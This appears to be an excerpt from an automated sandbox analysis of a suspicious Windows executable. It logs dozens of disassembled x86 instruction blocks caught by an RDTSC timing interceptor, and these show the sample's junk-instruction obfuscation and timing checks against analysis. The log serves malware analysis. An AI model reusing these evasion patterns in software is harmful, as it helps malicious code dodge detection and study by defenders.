Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570D01 second address: 7570D08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570D08 second address: 7570D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test edi, edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov ebx, esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570D16 second address: 7570D84 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1C28FAFD74h 0x00000008 sbb al, FFFFFF88h 0x0000000b jmp 00007F1C28FAFD6Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007F1C28FAFD78h 0x00000019 or al, FFFFFFE8h 0x0000001c jmp 00007F1C28FAFD6Bh 0x00000021 popfd 0x00000022 popad 0x00000023 js 00007F1C98BFE6B8h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F1C28FAFD75h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570D84 second address: 7570D8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570D8A second address: 7570D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570D8E second address: 7570D9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp-04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570D9F second address: 7570DB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570DB1 second address: 7570DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570DB5 second address: 7570DBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570DBB second address: 7570DC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570DC0 second address: 7570DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F1C28FAFD6Eh 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d lea eax, dword ptr [ebx+70h] 0x00000010 jmp 00007F1C28FAFD71h 0x00000015 push 00000001h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570DF2 second address: 7570DF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570DF6 second address: 7570DFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570DFC second address: 7570E02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570E02 second address: 7570E6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a mov dh, cl 0x0000000c mov cx, bx 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F1C28FAFD6Ah 0x00000018 xor ax, A6C8h 0x0000001d jmp 00007F1C28FAFD6Bh 0x00000022 popfd 0x00000023 push esi 0x00000024 jmp 00007F1C28FAFD6Fh 0x00000029 pop esi 0x0000002a popad 0x0000002b nop 0x0000002c jmp 00007F1C28FAFD6Fh 0x00000031 lea eax, dword ptr [ebp-18h] 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F1C28FAFD75h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570E6C second address: 7570EB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F1C29045F0Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 pop ebx 0x00000015 call 00007F1C29045F18h 0x0000001a pop eax 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570EB0 second address: 7570ECB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1C28FAFD77h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570ECB second address: 7570ECF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570EF8 second address: 7570FC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov bl, ah 0x0000000b popad 0x0000000c mov edi, eax 0x0000000e pushad 0x0000000f push ecx 0x00000010 mov dl, A7h 0x00000012 pop ecx 0x00000013 popad 0x00000014 test edi, edi 0x00000016 jmp 00007F1C28FAFD6Dh 0x0000001b js 00007F1C98BFE4E9h 0x00000021 pushad 0x00000022 mov di, cx 0x00000025 mov ebx, eax 0x00000027 popad 0x00000028 mov eax, dword ptr [ebp-14h] 0x0000002b jmp 00007F1C28FAFD72h 0x00000030 mov ecx, esi 0x00000032 jmp 00007F1C28FAFD70h 0x00000037 mov dword ptr [esi+0Ch], eax 0x0000003a jmp 00007F1C28FAFD70h 0x0000003f mov edx, 772406ECh 0x00000044 jmp 00007F1C28FAFD70h 0x00000049 sub eax, eax 0x0000004b pushad 0x0000004c push edi 0x0000004d pushfd 0x0000004e jmp 00007F1C28FAFD6Ah 0x00000053 add ecx, 6E58C9B8h 0x00000059 jmp 00007F1C28FAFD6Bh 0x0000005e popfd 0x0000005f pop eax 0x00000060 pushad 0x00000061 mov edi, 5234F5DAh 0x00000066 jmp 00007F1C28FAFD6Bh 0x0000006b popad 0x0000006c popad 0x0000006d lock cmpxchg dword ptr [edx], ecx 0x00000071 push eax 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570FC7 second address: 7570FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570FCB second address: 7570FD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570FD1 second address: 7570FD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570FD7 second address: 7570FDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570FDB second address: 757105A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c jmp 00007F1C29045F10h 0x00000011 test eax, eax 0x00000013 jmp 00007F1C29045F10h 0x00000018 jne 00007F1C98C945CAh 0x0000001e jmp 00007F1C29045F10h 0x00000023 mov edx, dword ptr [ebp+08h] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F1C29045F0Dh 0x0000002f and cl, 00000076h 0x00000032 jmp 00007F1C29045F11h 0x00000037 popfd 0x00000038 mov edi, ecx 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757105A second address: 75710C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi] 0x0000000b jmp 00007F1C28FAFD6Eh 0x00000010 mov dword ptr [edx], eax 0x00000012 pushad 0x00000013 mov ebx, eax 0x00000015 popad 0x00000016 mov eax, dword ptr [esi+04h] 0x00000019 pushad 0x0000001a mov dx, ax 0x0000001d mov ecx, 21C7ED0Dh 0x00000022 popad 0x00000023 mov dword ptr [edx+04h], eax 0x00000026 jmp 00007F1C28FAFD78h 0x0000002b mov eax, dword ptr [esi+08h] 0x0000002e jmp 00007F1C28FAFD70h 0x00000033 mov dword ptr [edx+08h], eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75710C5 second address: 75710E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75710E2 second address: 75710E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75710E8 second address: 75710EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75710EC second address: 7571176 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+0Ch] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F1C28FAFD75h 0x00000012 or ax, EA06h 0x00000017 jmp 00007F1C28FAFD71h 0x0000001c popfd 0x0000001d call 00007F1C28FAFD70h 0x00000022 mov ebx, esi 0x00000024 pop esi 0x00000025 popad 0x00000026 mov dword ptr [edx+0Ch], eax 0x00000029 jmp 00007F1C28FAFD6Dh 0x0000002e mov eax, dword ptr [esi+10h] 0x00000031 jmp 00007F1C28FAFD6Eh 0x00000036 mov dword ptr [edx+10h], eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F1C28FAFD77h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7571176 second address: 757118E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1C29045F14h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757118E second address: 7571192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7571192 second address: 75711CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+14h] 0x0000000b jmp 00007F1C29045F17h 0x00000010 mov dword ptr [edx+14h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F1C29045F10h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75711CB second address: 75711CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75711CF second address: 75711D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75711D5 second address: 75711DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75711DB second address: 7571256 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+18h] 0x0000000e pushad 0x0000000f call 00007F1C29045F0Eh 0x00000014 pushfd 0x00000015 jmp 00007F1C29045F12h 0x0000001a adc ecx, 45E1B6E8h 0x00000020 jmp 00007F1C29045F0Bh 0x00000025 popfd 0x00000026 pop ecx 0x00000027 call 00007F1C29045F19h 0x0000002c mov dh, al 0x0000002e pop edx 0x0000002f popad 0x00000030 mov dword ptr [edx+18h], eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7571256 second address: 757125D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov al, bl 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757125D second address: 757136E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+1Ch] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F1C29045F0Ch 0x00000013 sbb ax, 2ED8h 0x00000018 jmp 00007F1C29045F0Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F1C29045F18h 0x00000024 sbb cx, F938h 0x00000029 jmp 00007F1C29045F0Bh 0x0000002e popfd 0x0000002f popad 0x00000030 mov dword ptr [edx+1Ch], eax 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007F1C29045F14h 0x0000003a sub ax, 7398h 0x0000003f jmp 00007F1C29045F0Bh 0x00000044 popfd 0x00000045 pushfd 0x00000046 jmp 00007F1C29045F18h 0x0000004b sbb si, 9DF8h 0x00000050 jmp 00007F1C29045F0Bh 0x00000055 popfd 0x00000056 popad 0x00000057 mov eax, dword ptr [esi+20h] 0x0000005a pushad 0x0000005b pushfd 0x0000005c jmp 00007F1C29045F14h 0x00000061 jmp 00007F1C29045F15h 0x00000066 popfd 0x00000067 push eax 0x00000068 push edi 0x00000069 pop ecx 0x0000006a pop edi 0x0000006b popad 0x0000006c mov dword ptr [edx+20h], eax 0x0000006f jmp 00007F1C29045F16h 0x00000074 mov eax, dword ptr [esi+24h] 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007F1C29045F0Ah 0x00000080 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757136E second address: 7571374 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7571374 second address: 7571405 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1C29045F0Ch 0x00000009 jmp 00007F1C29045F15h 0x0000000e popfd 0x0000000f push esi 0x00000010 pop edx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov dword ptr [edx+24h], eax 0x00000017 pushad 0x00000018 mov ecx, 369A5EAFh 0x0000001d pushfd 0x0000001e jmp 00007F1C29045F14h 0x00000023 sub si, C1D8h 0x00000028 jmp 00007F1C29045F0Bh 0x0000002d popfd 0x0000002e popad 0x0000002f mov eax, dword ptr [esi+28h] 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F1C29045F0Bh 0x0000003b xor ecx, 7351C49Eh 0x00000041 jmp 00007F1C29045F19h 0x00000046 popfd 0x00000047 mov dx, cx 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7571405 second address: 7571451 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1C28FAFD73h 0x00000008 pushfd 0x00000009 jmp 00007F1C28FAFD78h 0x0000000e add ax, B0F8h 0x00000013 jmp 00007F1C28FAFD6Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [edx+28h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7571451 second address: 7571457 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7571457 second address: 7571476 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [esi+2Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1C28FAFD6Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7571476 second address: 757147A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757147A second address: 7571480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7571480 second address: 7571491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1C29045F0Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7571491 second address: 7571495 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7571495 second address: 757150D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+2Ch], ecx 0x0000000b jmp 00007F1C29045F0Dh 0x00000010 mov ax, word ptr [esi+30h] 0x00000014 jmp 00007F1C29045F0Eh 0x00000019 mov word ptr [edx+30h], ax 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F1C29045F0Eh 0x00000024 adc ah, 00000048h 0x00000027 jmp 00007F1C29045F0Bh 0x0000002c popfd 0x0000002d mov eax, 5F5096BFh 0x00000032 popad 0x00000033 mov ax, word ptr [esi+32h] 0x00000037 jmp 00007F1C29045F12h 0x0000003c mov word ptr [edx+32h], ax 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 pushad 0x00000044 popad 0x00000045 mov ebx, 3C96BA3Eh 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757150D second address: 75715A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+34h] 0x0000000c pushad 0x0000000d mov dx, cx 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 popad 0x00000015 mov dword ptr [edx+34h], eax 0x00000018 pushad 0x00000019 mov edi, esi 0x0000001b push eax 0x0000001c pushfd 0x0000001d jmp 00007F1C28FAFD73h 0x00000022 add ch, FFFFFFFEh 0x00000025 jmp 00007F1C28FAFD79h 0x0000002a popfd 0x0000002b pop eax 0x0000002c popad 0x0000002d test ecx, 00000700h 0x00000033 pushad 0x00000034 mov di, B8E0h 0x00000038 mov esi, ebx 0x0000003a popad 0x0000003b jne 00007F1C98BFDF04h 0x00000041 jmp 00007F1C28FAFD6Bh 0x00000046 or dword ptr [edx+38h], FFFFFFFFh 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F1C28FAFD75h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75715A5 second address: 75715D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1C29045F17h 0x00000008 mov si, E1FFh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f or dword ptr [edx+3Ch], FFFFFFFFh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75715D0 second address: 75715D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75715D4 second address: 75715EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75715EB second address: 7571611 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F1C28FAFD6Fh 0x00000008 pop ecx 0x00000009 push edi 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e or dword ptr [edx+40h], FFFFFFFFh 0x00000012 pushad 0x00000013 push edi 0x00000014 mov eax, 69C88663h 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7571611 second address: 7571621 instructions: 0x00000000 rdtsc 0x00000002 mov cx, BC51h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7571621 second address: 7571636 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75C0D68 second address: 75C0D6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75C0D6E second address: 75C0D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7500011 second address: 7500017 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7500017 second address: 750001B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 750001B second address: 750001F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 750001F second address: 7500057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov eax, 6B8BD5D1h 0x0000000f mov esi, 2AA6FE0Dh 0x00000014 popad 0x00000015 mov dword ptr [esp], ebp 0x00000018 jmp 00007F1C28FAFD78h 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7500057 second address: 750005B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 750005B second address: 7500061 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75005D0 second address: 7500637 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F1C29045F0Eh 0x0000000f push eax 0x00000010 jmp 00007F1C29045F0Bh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 mov ax, 6D4Bh 0x0000001b mov edi, eax 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 jmp 00007F1C29045F0Ah 0x00000025 pop ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F1C29045F17h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7500993 second address: 7500999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7500999 second address: 750099D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 750099D second address: 75009A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
